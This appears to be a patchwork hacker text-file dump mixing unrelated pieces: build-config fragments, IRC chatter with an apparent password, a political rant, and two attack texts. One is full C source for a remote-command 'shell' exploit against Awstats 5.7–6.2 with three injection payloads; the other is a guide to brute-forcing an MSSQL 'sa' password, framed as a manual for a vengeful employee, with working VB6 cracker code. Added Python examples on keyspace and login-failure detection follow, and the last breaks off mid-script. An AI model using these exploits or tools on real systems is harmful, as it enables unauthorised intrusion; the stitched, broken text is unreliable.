CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

- Project1.VBW:

Form1 = -3, 2, 572, 407, CZ, 0, 0, 0, 0, C
Form2 = 17, 18, 464, 400, C, 0, 0, 0, 0, C
frmAbout = 0, 0, 0, 0, C, 0, 0, 0, 0, C
Form3 = 36, 42, 483, 424, , 0, 0, 0, 0, C

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

msg nickserv identify !31%ca
oh mother fuckshit.
ahahaha. I'll give you a 3 second headstart.

----------------------
IF I WERE PRESIDENT
----------------------

(*)in my first term(*)

If I were president I would spearhead an initiative to buy back the Federal Reserve for the initial investment cost that the purchase contract stipulates. U.S. Currency would be tax free and tax dollars would no longer be spent repaying loans to the FED but appropriated to public works and reform projects.

If I were president I would cut back military spending and give grants to start viable alternative fuel co-ops in fuels such as bio-diesel and Ethanol/E-85.
This would not only take power away from oil companies and free the U.S. from
oil dependence, it would also boost the economy by reviving the dying U.S.
farm industry.

If I were president I would issue an executive order to legalize marijuana
and the growing of hemp. (Hemp produces twice the paper per acre)

If I were president I would introduce a bill to congress that strictly forbids
the use of television advertisement to appeal to children that includes
stipulations about magazine and billboard advertisements as well.

If I were president I would introduce a bill to congress that forbids the use
of laws and initiatives such as the Digital Millennium Copyright act and the
Trusted Computing Platform which remove free information from the public
domain and hinder the development of open source technologies.

If I were president I would push for states' rights. The United States of
America is just that, states united. The federal government is the
cooperation of all states towards the greater good. It is not the rule of a
government over subservient territories.

If I were president I would combat with a vengeance the abuse of the legal
system committed by the MPAA and RIAA. I would fight to have copyright
infringement viewed as only a civil matter not a criminal matter. I would
also combat the use of inflated figures and the use of terms such as "lost
money" that infers that money was spent when in reality it wasn't made.

If I were president I would attempt to begin a program that studies herbal
medical alternatives and publishes findings to the public. All companies that
devote at least 30% of their production to herbal medicines would enjoy a 25%
tax cut.

If I were president I would disallow companies that have major holdings in
any market (or anyone who has large holdings in these companies) from
donating to a campaign for any public office.

If I were president I would permanently assign national guard units to patrol
the border between Mexico and the U.S. to alleviate the explosive situation
imposed by the Minuteman Militia currently patrolling the border.

(*)in my second term(*)
@IF ELECTED@

If I were president I would commission a search of all classified documents
for human rights violations perpetrated by former leaders (President, Head of
the CIA, etc) against persons in other countries. If evidence is found those
who ordered the crime(s) will be deported and the evidence will be turned
over to courts in the countries in which the crime(s) was/were committed so
that they may be prosecuted according to the law of the region in which the
crime was perpetrated.

If I were president I would define terrorism exactly as Merriam Webster does.

If I were president I would issue an executive order nullifying all laws
which use indecisive language that results in whim laws. These are the
actions of a police state and cannot be tolerated in a nation based upon
freedom.

If I were president I would work with the patent office to further define
what can and cannot be patented and to what degree something can progress
towards human-like before it is unpatentable. Nothing found in nature
(especially human genes) can be patented and all patents already issued that
are found to be in violation would be revoked. It is a crime against humanity
to hoard information pertinent to the understanding of the human body for
profit.

If I were president I would make FEMA subject to the same scrutiny as any
other branch of the government. Directors would be elected. Power would be
limited and the budget would be disclosed in full to the public.

If I were president I would extract all troops from foreign soil.

If I were president I would withdraw from the U.N. until such a time that
coercion tactics are ceased and nation to nation mediation can be carried out
properly.

A Word From The Author
______________________

The president should be a student of the constitution. A Man of the people.
The president cannot base his decisions upon religious bias or personal
favor. He must respect the constitution as it is the foundation of our
country. Internal fraternization with corporations and abuse or neglect of
the law can no longer be tolerated. Nor can talk of globalization which is a
direct affront to sovereignty. We must fight back against the corpolitical
tyranny attempting to enslave us all and return the nation to its roots in
the Constitution.

Yours Truly,
DoobieEx
04/22/2005

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

* beanie` is now known as beanie did you ever get the beanie baby abortion dolls?

/*
 * Awstats exploit "shell"
 * code by omin0us
 * omin0us208 [at] gmail [dot] com
 * dtors security group
 * .:( http://dtors.ath.cx ):.
 *
 * Vulnerability reported by iDEFENSE
 *
 * The awstats exploit that was discovered allows
 * a user to execute arbitrary commands on the
 * remote server with the privileges of the httpd
 *
 * This exploit combines all three methods of exploitation
 * and acts as a remote "shell", parsing all returned
 * data to display command output and running in a loop
 * for continuous access.
 *
 * bash-2.05b$ awstats_shell localhost
 * Awstats 5.7 - 6.2 exploit Shell 0.1
 * code by omin0us
 * dtors security group
 * .: http://dtors.ath.cx :.
 * --------------------------------------
 * select exploit method:
 * 1. ?configdir=|cmd}
 * 2. ?update=1&logfile=|cmd|
 * 3. ?pluginmode=:system("cmd");
 *
 * method [1/2/3]? 1
 * starting shell...
 * (ctrl+c to exit)
 * sh3ll> id
 * uid=80(www) gid=80(www) groups=80(www)
 * DTORS_STOP
 * sh3ll> uname -a
 *
 * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11
 * 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386
 * DTORS_STOP
 * sh3ll>
 *
 * this is licensed under the GPL
 */

#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP "DTORS_STOP"

void usage(char *argv[]);

int main(int argc, char *argv[]){
    FILE *output;
    int sockfd;
    struct sockaddr_in addr;
    struct hostent *host;
    char *host_name=NULL, *awstats_dir=NULL;
    char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt;
    int i, j, flag, method, verbose=0;

    if(argc < 2){
        usage(argv);
    }

    printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n");
    printf("code by omin0us\n");
    printf("dtors security group\n");
    printf(".: http://dtors.ath.cx :.\n");
    printf("--------------------------------------\n");

    while(1){
        cli_opt = getopt(argc, argv, "h:d:v");
        if(cli_opt < 0)
            break;
        switch(cli_opt){
            case 'v':
                verbose = 1;
                break;
            case 'd':
                awstats_dir = optarg;
                break;
        }
    }

    if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
        printf("Please specify a Host\n");
        usage(argv);
    }

    if(!awstats_dir){
        awstats_dir = "/cgi-bin/awstats.pl";
    }

    printf("select exploit method:\n"
           "\t1. ?configdir=|cmd}\n"
           "\t2. ?update=1&logfile=|cmd|\n"
           "\t3. ?pluginmode=:system(\"cmd\");\n");

    while(method != '1' && method != '2' && method != '3'){
        printf("\nmethod [1/2/3]? ");
        method = getchar();
    }

    printf("starting shell...\n(ctrl+c to exit)\n");

    while(1){
        i=0;
        j=0;
        memset(cmd, 0, CMD_BUFFER);
        memset(cmd_url, 0, CMD_BUFFER*3);
        memset(incoming, 0, IN_BUFFER);

        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
            printf("Error creating socket\n");
            exit(1);
        }

        if((host = gethostbyname(argv[optind])) == NULL){
            printf("Could not resolv host\n");
            exit(1);
        }

        addr.sin_family = AF_INET;
        addr.sin_port = htons(PORT);
        addr.sin_addr = *((struct in_addr *)host->h_addr);

        printf("sh3ll> ");
        fgets(cmd, CMD_BUFFER-1, stdin);

        if(verbose)
            printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr)));

        if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){
            printf("Count not connect to host\n");
            exit(1);
        }

        output = fdopen(sockfd, "a");
        setbuf(output, NULL);

        cmd[strlen(cmd)-1] = '\0';

        if(strlen(cmd) == 0){
            cmd[0]='i';
            cmd[1]='d';
            cmd[3]='\0';
        }

        for(i=0; i= IN_BUFFER){
                printf("flag [-] incoming buffer full\n");
                exit(1);
            }
            if(flag==0){
                printf("exploitation of host failed\n");
                exit(1);
            }
        }

        while(strstr(incoming, MAGIC_STOP) == NULL){
            read(sockfd,&tmp,1);
            incoming[i++] = tmp;
            putchar(tmp);
            if(i >= IN_BUFFER){
                printf("putchar [-] incoming buffer full\n");
                exit(1);
            }
        }

        printf("\n");

        shutdown(sockfd, SHUT_WR);
        close(sockfd);
        fclose(output);
    }
    return(0);
}

void usage(char *argv[]){
    printf("Usage: %s [options] \n" , argv[0]);
    printf("Options:\n");
    printf(" -d directory of awstats script\n");
    printf(" '/cgi-bin/awstats.pl' is default\n");
    printf(" if no directory is specified\n\n");
    printf(" -v verbose mode (optional)\n\n");
    printf("example: %s -d /stats/awstats.pl website.com\n\n", argv[0]);
    exit(1);
}

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

mike_jackson@cheesebox:~$ touch /dev/penis
touch: cannot touch `/dev/penis': Permission denied
mike_jackson@cheesebox:~$

###############################################################################
##                                                                           ##
##                         How to brute force MSSQL                          ##
##                                                                           ##
###############################################################################

h4v3n
March 3, 2005
www.nettwerked.net

Disclaimer
----------

If you are going to be a stupid fuck and actually use this information for
attempting criminal activities you’ll probably get caught. I am releasing
information that I have found, how you use it is your choice, and I am not
responsible for your actions.

Foreword
--------

Most companies today rely more and more on the software giant Microsoft.
Personally I hate Microsoft and I try to find every way to prove that they
are inferior to open source software. I have nothing against a company trying
to make money but what MS is doing today is not simply trying to earn a
profit, they are trying to monopolize the market! In saying that, this phile
shows that Microsoft provides an insecure product to the consumer for a huge
price. Although in this phile I use Microsoft's own technology to break their
SQL server I am still against MS and use this only as one solution to
cracking a MSSQL server.

The tests that prove this phile correct were performed in a controlled
environment and with the owner's permission. OK think about it ... why would
I not give myself the permission to do this? The tests were performed on a P4
1.4Ghz with 512MB RAM running MSSQL Server 2003 and the remote system running
the attack was a Centrino laptop with 256Mb RAM. I have also performed these
tests in a medium sized business network. The server was a dual Xeon running
MSSQL 2003 and the users did not notice a large performance drop.

This attack is designed to be used from a PC on a 10/100 internal network,
and is not intended for remote internet use. The source code provided has a
bug where intermittently the network traffic will stop and wait for the ODBC
connection to time out. In a case where this lasts for many attempts simply
stop the attack and resume.
I have found that the attack will work better if a successful ODBC connection
is established before the attack is run. This is very simple to do as I
describe later in the phile.

Again as described in the disclaimer I am in no way responsible for your
actions. This information is provided here only for helping network and
database administrators secure their own systems. Do not in any way use this
information for malicious purposes.

Again this attack is designed to work from an internal network. It is best
accomplished if a person has a domain login or a MSSQL username and password.
Don't worry about the rights that your username has; we will upgrade them
very soon. In no way is this attack untraceable!!!! If you do use this attack
in a malicious attack you WILL get caught and I will not write to you while
you are in prison.

Ok enough of that. Let's get to the good stuff. In this phile I will do
things a little different from previous philes. I am adding an information
section that will give you the default information that MSSQL server installs
and that should be removed. Also I will be giving simple tips to secure your
MSSQL server. If you do not make these changes, your server will be
vulnerable to this attack. OK let's get it on!

Information
-----------

There are a few things in the default installation of MSSQL server that a
malicious attacker could take advantage of. First, to gain access to any
database you have to know which database you want to access and have a
username for that database. Well you're in luck; Microsoft has provided you
all that information in the default installation. Every database has a SQL
login account named "sa". The sa account (systems administrator) has
administrative rights to every database in MSSQL server, by default. It's
just that easy, now you have a username that you want to log in with.

Next you will need a database that you want to get into. Again Microsoft has
provided you with this information in the default installation. Most
administrators never remove the default databases. The two default databases
are "Northwind" and "pubs". These are in the server as example databases and
they are always there, unless removed by the administrator. Ok so now all
that is needed is a password. I will get more into how to obtain that a
little later.

MSSQL server is not very good with holding passwords. While I was testing all
this information I found out that while I was always putting in case
sensitive passwords MSSQL server didn't care what case it was. So if I was
putting in "AbCdE", then "abcde", or "ABCDE" would work too. Now what the
hell is that all about? Customers pay enormous amounts of money to get MSSQL,
the Microsoft Server OS, and then pay more money for CALs and the SQL server
doesn't even keep case sensitive passwords. Well it can, if the server uses
integrated security from the OS. We don't care about that because out of 4
different MSSQL servers I have seen the sa account was never integrated with
the OS and all the default databases were still sitting there.

These are some defaults that would make it fairly easy for any attacker to
get in. You now know everything that you need to get into a default
installation of MSSQL except the password. I will now give you the details on
how to obtain the password for the sa account. The ways described to obtain
passwords are in no way perfect; you will also need a little bit of luck.

Details
-------

Now with the information provided above I am sure that anyone can figure out
that a default installation of MSSQL is vulnerable to a brute force attack.
So you have an angry employee on your network and they know this information,
what are they going to do to come after your server? There are three stages
in a MSSQL brute force attack. First you have to find out where the server
is, then a brute force program will have to be written, and lastly the attack
will be launched.

The details of the attack will be written as a manual for a malicious user.
This will make it easier to write because I have had to go through these
steps and I have never had a user try to do this to one of my servers. So now
it is time to start thinking like a pissed off employee that wants a little
revenge.

How to find out where the company has their database. This is simple, using a
windows system open the control panel and open the ODBC data sources. The
ODBC data source administrator is a very powerful control. This will tell us
where the MSSQL server is and it will also be there to connect the brute
force program to the database. On the system DSN tab click add. You will have
another window come up and we are going to start creating a connection to the
unknown SQL server. Use the "SQL Server" driver and click next or finish,
whatever you see. Name the connection whatever you want to. I like to call it
brute. Fill in the description or leave it blank. Now click the toggle button
on the "server" field and WOW! there is your server. Click next and you will
see a very important screen. This is where we choose to use SQL Server
authentication. Do not include a login ID. Uncheck the box that is labeled
"Connect to SQL Server to obtain default settings for the additional
configuration options". In my experience I have found that sometimes during
the brute force attack the ODBC connection will lose this setting. So if the
attack slows down or stalls this may be the reason. The rest of the
connection will all be default settings. Don't try to test the connection
because it will fail.

Ok so now we know where the server is and we have a connection made to it.
All we need now is the password for the sa account. How do we get it? Well
there are many different ways to crack a MSSQL password: social engineering,
a dictionary attack, or my favorite, BRUTE FORCE! You don't want to spend a
lot of time trying to get this password but today administrators are using
complex and very long passwords. If this is the case you will probably never
get the password and your administrator has won the fight. If you have an
admin like some I know then you will crack the sa password in a few days and
then you will probably have the password to other accounts.

Time to decide if this is the right attack for you. First you have to
understand how a brute force attack works, and how long it may take. A brute
force attack goes through every ASCII combination before the correct one is
found. When you launch a brute force attack on a MSSQL server we already know
that we can eliminate 26 ASCII characters because there are no case sensitive
passwords. Most people use all lowercase letters in a password and that makes
cracking passwords very easy. When you start using numerical and non
alphanumeric characters there can be 68 different characters in one position
which then causes a brute force attack to take a very long time. The
following table will help anyone understand how long it could take to crack a
complex password.

Alphabetical all lowercase

Length  Possible Combinations
  1     26
  2     702
  3     18,278
  4     475,254
  5     12,356,630
  6     321,272,406
  7     8,353,082,582
  8     217,180,147,158
  9     5,646,683,826,134
 10     146,813,779,479,510
 11     3,817,158,266,467,290
 12     99,246,114,928,149,500
 13     2,580,398,988,131,890,000
 14     67,090,373,691,429,000,000
 15     1,744,349,715,977,160,000,000
 16     45,353,092,615,406,000,000,000
 17     1,179,180,408,000,560,000,000,000
 18     30,658,690,608,014,500,000,000,000
 19     797,125,955,808,376,000,000,000,000
 20     20,725,274,851,017,800,000,000,000,000

Alphabetical all lower case and numbers

Length  Possible Combinations
  1     36
  2     1,332
  3     47,988
  4     1,727,604
  5     62,193,780
  6     2,238,976,116
  7     80,603,140,212
  8     2,901,713,047,668
  9     104,461,669,716,084
 10     3,760,620,109,779,060
 11     135,382,323,952,046,000
 12     4,873,763,662,273,660,000
 13     175,455,491,841,852,000,000
 14     6,316,397,706,306,670,000,000
 15     227,390,317,427,040,000,000,000
 16     8,186,051,427,373,440,000,000,000
 17     294,697,851,385,444,000,000,000,000
 18     10,609,122,649,876,000,000,000,000,000
 19     381,928,415,395,535,000,000,000,000,000
 20     13,749,422,954,239,300,000,000,000,000,000

Alphabetical all lower case, punctuation, and numbers

Length  Possible Combinations
  1     68
  2     4,692
  3     319,124
  4     21,700,500
  5     1,475,634,068
  6     100,343,116,692
  7     6,823,331,935,124
  8     463,986,571,588,500
  9     31,551,086,868,018,100
 10     2,145,473,907,025,230,000
 11     145,892,225,677,716,000,000
 12     9,920,671,346,084,660,000,000
 13     674,605,651,533,757,000,000,000
 14     45,873,184,304,295,500,000,000,000
 15     3,119,376,532,692,090,000,000,000,000
 16     212,117,604,223,062,000,000,000,000,000
 17     14,423,997,087,168,200,000,000,000,000,000
 18     980,831,801,927,439,000,000,000,000,000,000
 19     66,696,562,531,065,900,000,000,000,000,000,000
 20     4,535,366,252,112,480,000,000,000,000,000,000,000

Alphabetical upper and lowercase, punctuation and numbers

Length  Possible Combinations
  1     94
  2     8,930
  3     839,514
  4     78,914,410
  5     7,417,954,634
  6     697,287,735,690
  7     65,545,047,154,954
  8     6,161,234,432,565,770
  9     579,156,036,661,182,000
 10     54,440,667,446,151,200,000
 11     5,117,422,739,938,210,000,000
 12     481,037,737,554,192,000,000,000
 13     45,217,547,330,094,000,000,000,000
 14     4,250,449,449,028,840,000,000,000,000
 15     399,542,248,208,711,000,000,000,000,000
 16     37,556,971,331,618,800,000,000,000,000,000
 17     3,530,355,305,172,170,000,000,000,000,000,000
 18     331,853,398,686,184,000,000,000,000,000,000,000
 19     31,194,219,476,501,300,000,000,000,000,000,000,000
 20     2,932,256,630,791,120,000,000,000,000,000,000,000,000

Now that you have seen these staggering numbers you wish that was in your
bank account. Well in one of my tests I changed the sa password to ‘zzzz’;
this would be the very last password in the combinations that had 4
characters using only lower case letters. Well it took the program only 336
minutes. So let’s just say if the sa password is over 5 characters long or
includes punctuation you will never live long enough to see the password get
cracked. I never said a brute force was the perfect attack. So if you think
your admin is an idiot and uses small passwords you will want to continue.

The next step is to create the brute force program. I chose to write this in
Visual Basic 6 just because it is easy to write and I have a license to use
MS VB6. In the program I broke down the attack into four stages: weak,
normal, strong, and crazy strong. If you have to use strong or the crazy
strong options you will probably not get the password in your lifetime.
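
The arithmetic behind the tables above, as an added example that is not part of the original phile: it reproduces the cumulative counts, derives the guess rate implied by the ‘zzzz’ test (475,254 candidates in 336 minutes), and projects worst-case exhaust times, which is the figure a password-length policy has to beat. Function and constant names are illustrative, and the rate is that single measurement, so other servers and networks will differ.

```python
# Added example: keyspace and time-to-exhaust estimates for the tables above.
# Names are illustrative; the only measured input is the article's own test.

# Alphabet sizes of the article's four attack strengths.
WEAK, NORMAL, STRONG, CRAZY = 26, 36, 68, 94

# The article's measurement: reaching 'zzzz' (every lowercase password of
# length 1-4, i.e. 475,254 candidates) took 336 minutes.
MEASURED_CANDIDATES = 475_254
MEASURED_SECONDS = 336 * 60
SECONDS_PER_YEAR = 365 * 24 * 3600

# The 94 printable, non-space ASCII characters (codes 33..126).
PRINTABLE = [chr(c) for c in range(33, 127)]


def cumulative_keyspace(alphabet, max_len):
    """Number of passwords of length 1..max_len (the tables' right column)."""
    return sum(alphabet ** n for n in range(1, max_len + 1))


def measured_rate():
    """Online guesses per second implied by the article's test (about 23.6)."""
    return MEASURED_CANDIDATES / MEASURED_SECONDS


def seconds_to_exhaust(alphabet, max_len, rate=None):
    """Worst-case time to try every password up to max_len at `rate` guesses/s."""
    rate = measured_rate() if rate is None else rate
    return cumulative_keyspace(alphabet, max_len) / rate


def effective_alphabet(chars, case_sensitive):
    """Distinct symbols a guesser must cover; ignoring case merges A-Z into a-z."""
    if case_sensitive:
        return len(set(chars))
    return len({c.lower() for c in chars})


def min_length(alphabet, years, rate=None):
    """Shortest maximum length whose full keyspace outlasts `years` of guessing."""
    rate = measured_rate() if rate is None else rate
    target = years * SECONDS_PER_YEAR * rate
    length = 1
    while cumulative_keyspace(alphabet, length) < target:
        length += 1
    return length


if __name__ == "__main__":
    print(f"measured rate: {measured_rate():.1f} guesses/s")
    for name, size in (("weak", WEAK), ("normal", NORMAL),
                       ("strong", STRONG), ("crazy", CRAZY)):
        for length in (4, 6, 8, 10):
            days = seconds_to_exhaust(size, length) / 86400
            total = cumulative_keyspace(size, length)
            print(f"{name:7s} len<={length:2d}: {total:>22,d} candidates, "
                  f"{days:,.1f} days")
    print("alphabet when case is ignored:", effective_alphabet(PRINTABLE, False))
    print("length to outlast 10 years (weak set):", min_length(WEAK, 10))
```

The function returns exact integers, while the longer table entries above are rounded to about 15 significant digits, so the last digits differ from length 11 onward in the first table.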
VB6 Source Code
---------------

(main.frm)

Function IncrementTextStringWeak(txtWeak As String) As String
    Dim L As Integer, i As Integer, c As Integer
    Dim S As String
    S = txtWeak
    L = Len(S)
    For i = L To 1 Step -1
        c = Asc(Mid(S, i, 1))
        Select Case c
            Case 97 To 121
                S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
                Exit For
            Case 122
                S = Left(S, i - 1) & "a" & Mid(S, i + 1)
        End Select
    Next i
    If i = 0 Then
        IncrementTextStringWeak = String(L + 1, 97)
    Else
        IncrementTextStringWeak = S
    End If
End Function

Function IncrementTextStringNorm(txtNorm As String) As String
    Dim L As Integer, i As Integer, c As Integer
    Dim S As String
    S = txtNorm
    L = Len(S)
    For i = L To 1 Step -1
        c = Asc(Mid(S, i, 1))
        Select Case c
            Case 48 To 56, 97 To 121
                S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
                Exit For
            Case 57
                S = Left(S, i - 1) & "a" & Mid(S, i + 1)
                Exit For
            Case 122
                S = Left(S, i - 1) & "0" & Mid(S, i + 1)
        End Select
    Next i
    If i = 0 Then
        IncrementTextStringNorm = String(L + 1, 48)
    Else
        IncrementTextStringNorm = S
    End If
End Function

Function IncrementTextStringStrong(txtStrong As String) As String
    Dim L As Integer, i As Integer, c As Integer
    Dim S As String
    S = txtStrong
    L = Len(S)
    For i = L To 1 Step -1
        c = Asc(Mid(S, i, 1))
        Select Case c
            Case 33 To 63, 97 To 125
                S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
                Exit For
            Case 64
                S = Left(S, i - 1) & "a" & Mid(S, i + 1)
                Exit For
            Case 126
                S = Left(S, i - 1) & "!" & Mid(S, i + 1)
        End Select
    Next i
    If i = 0 Then
        IncrementTextStringStrong = String(L + 1, 33)
    Else
        IncrementTextStringStrong = S
    End If
End Function

Function IncrementTextStringCrazy(txtcrazy As String) As String
    Dim L As Integer, i As Integer, c As Integer
    Dim S As String
    S = txtcrazy
    L = Len(S)
    For i = L To 1 Step -1
        c = Asc(Mid(S, i, 1))
        Select Case c
            Case 33 To 125
                S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
                Exit For
            Case 126
                S = Left(S, i - 1) & "!" & Mid(S, i + 1)
        End Select
    Next i
    If i = 0 Then
        IncrementTextStringCrazy = String(L + 1, 33)
    Else
        IncrementTextStringCrazy = S
    End If
End Function

Public Sub Option1_Click(Index As Integer)
    Select Case Index
        Case 0
            strength = 0
        Case 1
            strength = 1
        Case 2
            strength = 2
        Case 3
            strength = 3
    End Select
End Sub

Private Sub cmdstart_Click()
    Option1(0).Enabled = False
    Option1(1).Enabled = False
    Option1(2).Enabled = False
    Option1(3).Enabled = False
    txtdatabase.Enabled = False
    txtsource.Enabled = False
    txtpassword.Enabled = False
    txtuser.Enabled = False
    txtprovider.Enabled = False
    cmdstop.Default = True
    cmdstart.Enabled = False
    cmdstop.Enabled = True
    Timer1.Enabled = True
End Sub

Private Sub cmdstop_Click()
    Option1(0).Enabled = True
    Option1(1).Enabled = True
    Option1(2).Enabled = True
    Option1(3).Enabled = True
    txtdatabase.Enabled = True
    txtsource.Enabled = True
    txtpassword.Enabled = True
    txtuser.Enabled = True
    txtprovider.Enabled = True
    cmdstart.Default = True
    cmdstart.Enabled = True
    cmdstop.Enabled = False
    Timer1.Enabled = False
End Sub

Private Sub Timer1_Timer()
    On Error GoTo ErrHandler
    Dim varserver As String
    Dim vardatabase As String
    Dim varuser As String
    Dim varpassword As String
    Dim varamount As String
    Dim cn As ADODB.Connection
    Dim conn As String
    Dim rs As ADODB.Recordset
    Dim sql As String
    Dim count As String

    Select Case strength
        Case 0
            txtpassword.Text = IncrementTextStringWeak(txtpassword.Text)
        Case 1
            txtpassword.Text = IncrementTextStringNorm(txtpassword.Text)
        Case 2
            txtpassword.Text = IncrementTextStringStrong(txtpassword.Text)
        Case 3
            txtpassword.Text = IncrementTextStringCrazy(txtpassword.Text)
    End Select

    conn = "Provider=" & txtprovider.Text
    conn = conn & ";Password="
    conn = conn & txtpassword.Text
    conn = conn & ";Persist Security Info=True;User ID="
    conn = conn & txtuser.Text
    conn = conn & ";Data Source="
    conn = conn & txtsource.Text

    Set cn = New ADODB.Connection
    cn.Open conn
    cn.Close
    Set cn = Nothing

    Timer1.Enabled = False
    Option1(0).Enabled = True
    Option1(1).Enabled = True
    Option1(2).Enabled = True
    Option1(3).Enabled = True
    txtdatabase.Enabled = True
    txtsource.Enabled = True
    txtpassword.Enabled = True
    txtuser.Enabled = True
    txtprovider.Enabled = True
    cmdstart.Default = True
    cmdstart.Enabled = True
    cmdstop.Enabled = False
    Exit Sub
ErrHandler:
    If Not cn Is Nothing Then Set cn = Nothing
End Sub

(modules.bas)

Public strength As Integer

Of course you will have to create a visual interface for this code, but
that’s the easy part. Spend as much time on it as you want. You can also add
functionality to the program by running it as a service or minimizing it to
the system tray, but I chose not to add this in. Of course you will have to
set the properties on the timer object and you will have to compile the
executable but you already knew that right?

Alright now we are on to step three, cracking the sa password. I first opened
the ODBC connection and made sure the settings were correct and tested it
with a plain user account. Open up the brute force program and select the
strength that you would like the attack to run at and then enter ‘NorthWind’
as the database. In the username field enter ‘sa’, and the provider for a
MSSQL database is ‘MSDASQL.1’. Hit the start button and all you have to do is
wait.

OK let’s say you left this program running while you went for your two week
vacation and came back and you have the password. Congratulations you now
have administrative access to your company’s MSSQL database! What to do now
you ask? Well that is not for me to tell you.

Conclusion
----------

So now all you administrators out there know not to use weak passwords and to
remove all default databases out of MSSQL. Well I hate to tell you, that’s
not enough. Databases are used in so many different ways and how you use your
database probably opens up more ways to get into it. While writing this phile
I have now noticed eight other ways to get into one MSSQL database.
All I can think of now is thank “God” I found out about this before someone
else did. Security on your network is not a joke! Your users probably know
more than you give them credit for. So do what any smart admin does and trust
no one, hack your own system then secure it.

Well that’s all for now kiddies, I hope you have had an educational
experience reading this, and I hope you have changed your passwords on your
MSSQL server to insanely long and complex text strings. Until next time watch
your network because you never know who is plotting their attack.

Shouts
------

tek (thanks for pushing me to finish this), the #hackcanada crew, Nettwerked
(www.nettwerked.net), Hack Canada (www.hackcanada.com). Without these people
and resources I would not be myself as I know today.

###############################################################################
###############################################################################
## ##
## hh 44 44 vv vv 333333 nnnnn ##
## hh 44 44 vv vv 33 nnnnnn ##
## hhhh 444444 vv vv 333333 nn nn ##
## hhhhh 44 vv vv 333333 nn nn ##
## hh hh 44 vvvv 33 nn nn ##
## hh hh 44 vv 333333 nn nn ##
## ##
###############################################################################
###############################################################################
## ##
## 111 99999 888 44 44 ##
## 1111 99 99 88 88 44 44 ##
## 11 99999 888 444444 ##
## 11 99 888 888 44 ##
## 11 99 88 88 44 ##
## 1111 99 888 44 ##
## ##
## is here ... ignorance is no excuse ##
## ##
###############################################################################
###############################################################################

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

NEVER, EVER, EVER pee after you've handled chilli peppers. Half an hour later, IT STILL BURNS.

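
On the administrator's side of the MSSQL brute-force phile above, every guess such a tool makes is a failed login that the server can record. The added example below (not part of the original phile) scans error-log lines for a burst of failures from one client against one login and for a success that follows such a burst. It assumes login auditing is enabled and the ERRORLOG line layout written by SQL Server 2005 and later; the sample lines, addresses, function names and thresholds are constructed for illustration.

```python
# Added example: flag bursts of failed SQL logins and a success that follows.
# Log layout assumed: SQL Server 2005+ ERRORLOG with login auditing enabled.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*?\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse(line):
    """Return (timestamp, result, login, client) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    # Logins are compared case-insensitively ('SA' and 'sa' are one account).
    return ts, m["result"], m["user"].lower(), m["client"].strip()


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Yield-style list of alerts: (kind, client, login, timestamp)."""
    recent = defaultdict(deque)   # (client, login) -> times of recent failures
    flagged = set()               # pairs that already crossed the threshold
    alerts = []
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        ts, result, user, client = event
        key = (client, user)
        failures = recent[key]
        # Drop failures that have aged out of the sliding window.
        while failures and ts - failures[0] > window:
            failures.popleft()
        if result == "failed":
            failures.append(ts)
            if len(failures) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("brute-force", client, user, ts))
        elif key in flagged:
            # A success after a guessing burst means the password was found
            # (or known): treat the account as compromised.
            alerts.append(("success-after-brute-force", client, user, ts))
    return alerts


# Constructed sample log: one user mistyping a password, then twelve 'sa'
# failures two seconds apart from a single client, then an 'sa' success.
SAMPLE_LOG = [
    "2005-03-03 09:13:58.10 Logon       Error: 18456, Severity: 14, State: 8.",
    "2005-03-03 09:13:58.10 Logon       Login failed for user 'jsmith'. "
    "[CLIENT: 10.1.4.77]",
    "2005-03-03 09:14:05.42 Logon       Login succeeded for user 'jsmith'. "
    "Connection made using SQL Server authentication. [CLIENT: 10.1.4.77]",
] + [
    f"2005-03-03 09:15:{sec:02d}.00 Logon       Login failed for user 'sa'. "
    "[CLIENT: 10.1.4.23]"
    for sec in range(0, 24, 2)
] + [
    "2005-03-03 09:15:30.00 Logon       Login succeeded for user 'sa'. "
    "Connection made using SQL Server authentication. [CLIENT: 10.1.4.23]",
]

if __name__ == "__main__":
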